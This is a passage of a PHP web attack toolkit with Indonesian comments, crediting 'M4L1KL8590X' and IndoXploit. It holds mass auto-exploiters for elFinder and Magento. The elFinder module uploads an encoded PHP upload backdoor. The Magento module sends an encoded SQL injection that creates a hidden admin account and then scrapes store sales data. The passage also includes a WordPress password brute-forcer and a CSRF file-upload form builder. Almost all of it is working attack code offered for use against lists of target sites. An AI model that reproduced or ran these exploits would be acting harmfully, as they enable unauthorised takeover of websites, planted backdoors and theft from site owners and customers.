1410 }
1411 }else{
1412 echo "$sites => Not Vuln<br>";
1413 }
1414 }
1415 }
1416echo "</div>";
1417}
1418elseif($_GET['go'] == 'elfinder') {
1419?>
1420<div class='mybox'><h1><center>elfinder Auto Exploiter</center></h1><hr color='white'><br><br>
1421 <center><form method="post">
1422Target: <br>
1423<textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
1424<input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
1425</form>
1426</html>
1427<?php
1428# IndoXploit
1429function ngirim($url, $isi) {
1430$ch = curl_init ("$url");
1431 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
1432 curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
1433 curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1434 curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
1435 curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
1436 curl_setopt ($ch, CURLOPT_POST, 1);
1437 curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
1438 curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
1439 curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
1440$data3 = curl_exec ($ch);
1441return $data3;
1442}
1443$target = explode("\r\n", $_POST['target']);
1444if($_POST['x']) {
1445 foreach($target as $korban) {
1446 $nama_doang = "k.php";
1447 $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
1448 $decode_isi = base64_decode($isi_nama_doang);
1449 $encode = base64_encode($nama_doang);
1450 $fp = fopen($nama_doang,"w");
1451 fputs($fp, $decode_isi);
1452 echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
1453 echo "# Upload[1] ......<br>";
1454 $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
1455 $b = file_get_contents("$url_mkfile");
1456 $post1 = array(
1457 "cmd" => "put",
1458 "target" => "l1_$encode",
1459 "content" => "$decode_isi",
1460 );
1461 $post2 = array(
1462 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
1463 "upload[]" => "@$nama_doang",);
1464 $output_mkfile = ngirim("$korban", $post1);
1465 if(preg_match("/$nama_doang/", $output_mkfile)) {
1466 echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
1467 } else {
1468 echo "# Upload Failed 1 <br># Uploading 2..<br>";
1469 $upload_ah = ngirim("$korban?cmd=upload", $post2);
1470 if(preg_match("/$nama_doang/", $upload_ah)) {
1471 echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
1472 } else {
1473 echo "# Upload Failed 2<br><br>";
1474 }
1475 }
1476 }
1477}
1478echo "</div>";
1479}
1480elseif($_GET['go'] == 'hashid') {
1481if (isset($_POST['gethash'])) {
1482 $hash = $_POST['hash'];
1483 if (strlen($hash) == 32) {
1484 $hashresult = "MD5 Hash";
1485 } elseif (strlen($hash) == 40) {
1486 $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
1487 } elseif (strlen($hash) == 13) {
1488 $hashresult = "DES(Unix) Hash";
1489 } elseif (strlen($hash) == 16) {
1490 $hashresult = "MySQL Hash / /DES(Oracle Hash)";
1491 } elseif (strlen($hash) == 41) {
1492 $GetHashChar = substr($hash, 40);
1493 if ($GetHashChar == "*") {
1494 $hashresult = "MySQL5 Hash";
1495 }
1496 } elseif (strlen($hash) == 64) {
1497 $hashresult = "SHA-256 Hash";
1498 } elseif (strlen($hash) == 96) {
1499 $hashresult = "SHA-384 Hash";
1500 } elseif (strlen($hash) == 128) {
1501 $hashresult = "SHA-512 Hash";
1502 } elseif (strlen($hash) == 34) {
1503 if (strstr($hash, '$1$')) {
1504 $hashresult = "MD5(Unix) Hash";
1505 }
1506 } elseif (strlen($hash) == 37) {
1507 if (strstr($hash, '$apr1$')) {
1508 $hashresult = "MD5(APR) Hash";
1509 }
1510 } elseif (strlen($hash) == 34) {
1511 if (strstr($hash, '$H$')) {
1512 $hashresult = "MD5(phpBB3) Hash";
1513 }
1514 } elseif (strlen($hash) == 34) {
1515 if (strstr($hash, '$P$')) {
1516 $hashresult = "MD5(Wordpress) Hash";
1517 }
1518 } elseif (strlen($hash) == 39) {
1519 if (strstr($hash, '$5$')) {
1520 $hashresult = "SHA-256(Unix) Hash";
1521 }
1522 } elseif (strlen($hash) == 39) {
1523 if (strstr($hash, '$6$')) {
1524 $hashresult = "SHA-512(Unix) Hash";
1525 }
1526 } elseif (strlen($hash) == 24) {
1527 if (strstr($hash, '==')) {
1528 $hashresult = "MD5(Base-64) Hash";
1529 }
1530 } else {
1531 $hashresult = "Hash type not found";
1532 }
1533 } else {
1534 $hashresult = "Not Hash Entered";
1535 }
1536?>
1537 <div class='mybox' style="text-align:left">
1538 <form action="" method="POST">
1539 <tr>
1540 <table >
1541 <center><h1>hash identifier</h1><hr color='white'></tr>
1542 <tr class="optionstr"><B><td>String</td></b><td>:</td>
1543 <td><input style='border:0;border-bottom:1px solid #292929; width:500px;' type="text" name="hash" size='60'/></td>
1544 <td><input type="submit" class="kotak" name="gethash" value="Identify Hash" /></td></tr>
1545 <tr class="optionstr"><b><td>Hasil</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
1546 </table></tr></form><br>
1547 </div>
1548<?php
1549}
1550
1551elseif($_GET['go'] == 'csrf') {
1552?> <html>
1553<title>CSRF EXPLOITER ONLINE</title>
1554<center><div class="mybox"><h1>csrf online</h1><hr color='white'><br><br>
1555<font color=Lavenda>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
1556<center>
1557<form method="post">
1558URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
1559POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
1560<input type="submit" name="d" value="Lock!">
1561</form>
1562<?php
1563//gak penting
1564 @$url = $_POST['url'];
1565 @$pf = $_POST['pf'];
1566 @$d = $_POST['d'];
1567if($d) {
1568 //baccod
1569
1570 echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><br><input type='submit' name='g' value='Upload Cok!'></form";
1571}
1572?>
1573</form>
1574<?php
1575 ;
1576}
1577elseif ($_GET['go'] == 'zonesong') {
1578
1579 echo '<center><img src="http:///tenor.gif" style: width="250px"><audio autoplay="" src="http:///walker.mp3"></audio><br><br><br><br><br></center>';
1580}
1581elseif($_GET['go'] == 'wpbrute') {
1582 set_time_limit(0);
1583error_reporting(0);
1584class berandal{
1585 private $host;
1586 private $user;
1587 private $open;
1588 private $list;
1589public function banner() {
1590 echo "<div class='mybox' style='text-align:left'>
1591 <center><h1>WordPress Brute Force</h1><hr color='white'>
1592 <form action='' method='POST'>
1593 Host<input type='text' name='host' width:500px;' value='http://127.0.0.1/' size='40'><br><br>
1594 User<input type='text' name='user' width:500px;' value='admin' size='25'><br><br>
1595 Wordlist:
1596 <textarea class='mybox' rows='10' name='list'></textarea><br>
1597 <input type='Submit' class='kotak' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Start'>
1598 </form></div>
1599 ";
1600
1601}
1602
1603 public function extract_post() {
1604 $this->host = $_POST["host"];
1605 $this->user = $_POST["user"];
1606 $this->open = $_POST["list"];
1607 }
1608
1609 public function Xregex() {
1610 if(preg_match("@/wp-login.php@", $this->host)) {
1611 return true;
1612 } else {
1613 $this->host = $_POST["host"]."/wp-login.php";
1614 }
1615 }
1616
1617 public function brute() {
1618 $list = array_filter(explode("\n", $this->open));
1619 foreach($list as $this->list) {
1620 for($i=0; $i < count($this->list); $i++) {
1621 $this->Xcurl();
1622 }
1623 }
1624 }
1625
1626 private function cool() {
1627 echo "[+] Host:"."<font color='black'>{$this->host}</font>";
1628 echo " <br/>[+] User:"."<font color='black'>{$this->user}</font>";
1629 echo " <br/>[+] Pass:"."<font color='black'>{$this->list}</font>";
1630 }
1631
1632 private function Xcurl() {
1633 $curl = curl_init();
1634 curl_setopt($curl, CURLOPT_URL, $this->host);
1635 curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
1636 curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
1637 curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
1638 curl_setopt($curl, CURLOPT_POST, true);
1639 curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->list&wp-submit=Login&redirect_to=$this->host/wp-admin/");
1640 $exec = curl_exec($curl);
1641 $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
1642 $this->cool();
1643 if($http == 302) {
1644 echo "<font color='#00FF00'> <br/>[+] Sukses! [+] Tinggal Login Aja</font><br>";
1645
1646 } else {
1647 echo "<font color='white'><br/>[+] Ggal Jancok! -_-</font><br>";
1648 }
1649 curl_close($curl);
1650 }
1651}
1652
1653$wp = new berandal();
1654$wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
1655$wp->banner();
1656$wp->extract_post();
1657$wp->Xregex();
1658$wp->brute();
1659 }
1660elseif($_GET['go'] == 'magento') {
1661 echo '<center><div class="mybox"><h1>Magento Auto Exploiter</h1><hr color="white"><br>
1662<form method="post" action="">
1663<center>
1664<textarea placeholder="http://127.0.0.1/" class="mybox" rows="10" name="target" required></textarea><br><br>
1665<input class="kotak" type=submit name=submit value="Start"><br>
1666</form></div>';
1667error_reporting(0);
1668set_time_limit(0);
1669
1670function bersihkan($htmltags) {
1671 $htmltags = str_replace('<span class="price">','',$htmltags);
1672 $htmltags = str_replace('</span>','',$htmltags);
1673 return $htmltags;
1674
1675}
1676
1677///postdata
1678$postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
1679$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=owlsquad&login%5Bpassword%5D=owlsquad";
1680$postdwn = "username=owlsquad&password=owlsquad";
1681$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
1682$pagelog = "/admin/";
1683$pagedwn = "/downloader/";
1684
1685function berandal_CURL($url,$data,$page) {
1686$ch = curl_init();
1687curl_setopt ($ch, CURLOPT_URL, $url.$page);
1688curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
1689curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
1690curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
1691curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
1692curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1693curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
1694curl_setopt ($ch, CURLOPT_POST, 1);
1695$headers = array();
1696$headers[] = 'Content-Type: application/x-www-form-urlencoded';
1697
1698curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
1699curl_setopt ($ch, CURLOPT_HEADER, 1);
1700$result = curl_exec ($ch);
1701curl_close($ch);
1702return $result;
1703}
1704print $banner;
1705
1706if(isset($_POST['target'])){
1707$j=explode("\r\n",$_POST['target']);
1708foreach($j as $site){
1709
1710 echo'<div class="mybox"><font color="white">';
1711print "Checking, Please wait!
1712<br>";
1713echo'</font>';
1714$sikat = berandal_CURL($site , $postadm, $pageadm);
1715
1716if(preg_match('#200 OK#', $sikat)) {
1717 $expres = "Success";
1718 $ceklog = berandal_CURL($site , $postlog, $pagelog);
1719
1720if(preg_match('#302 Moved#', $ceklog)) {
1721 preg_match_all('#<span>(.*?)</span>#si', $ceklog, $match);
1722 foreach($match as $val)
1723 {
1724 $ltm = $val[0];
1725 $avo = $val[1];
1726 break;
1727 }
1728 $admlog = "Sukses!";
1729 $user = "owlsquad";
1730 $pass = "owlsquad";
1731 $cekdwn = berandal_CURL($site , $postdwn, $pagedwn);
1732 if(preg_match('#Return to Admin#', $cekdwn)) {
1733 $dwnlog = "Login Sukses!";
1734}else {
1735 $dwnlog = "Login Gagal anjg!";
1736}
1737}else {
1738 $admlog = "Gagal!";
1739 $user = "NULL";
1740 $pass = "NULL";
1741}
1742}else {
1743 $admlog = "Gagal!";
1744 $expres = "Gagal!";
1745 $user = "NULL";
1746 $pass = "NULL";
1747 $dwnlog = "Login Gagal Anjg!";
1748 $ltm = "NULL";
1749 $avo = "NULL";
1750}
1751
1752///echo result
1753$logger = '
1754<br>
1755 <font color="white">
1756 <h4>[ '.$site.' ]</h4></font><br>
1757 Exploiting : <font color="lime">'.$expres.'</font><br>
1758 Login Admin : <font color="lime">'.$admlog.'</font><br>
1759 Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
1760 Average Order : <font color="gold">'.bersihkan($avo).'</font><br>
1761 Downloader : <font color="white">'.$dwnlog.'</font><br>
1762 Username :<font color="#29c8ef"><b> '.$user.'</font></b><br>
1763 Password :<font color="#29c8ef"><b> '.$pass.'</font></b><br>
1764 </div>';
1765 echo $logger;
1766///diilangin
1767}
1768}
1769}
1770
1771
1772
1773
1774echo "<center>
1775</font>Copyright © ".date("Y")." - TOOLS ONLINE BY M4L1KL8590X RECODED ALL SHELL</center>";
1776?>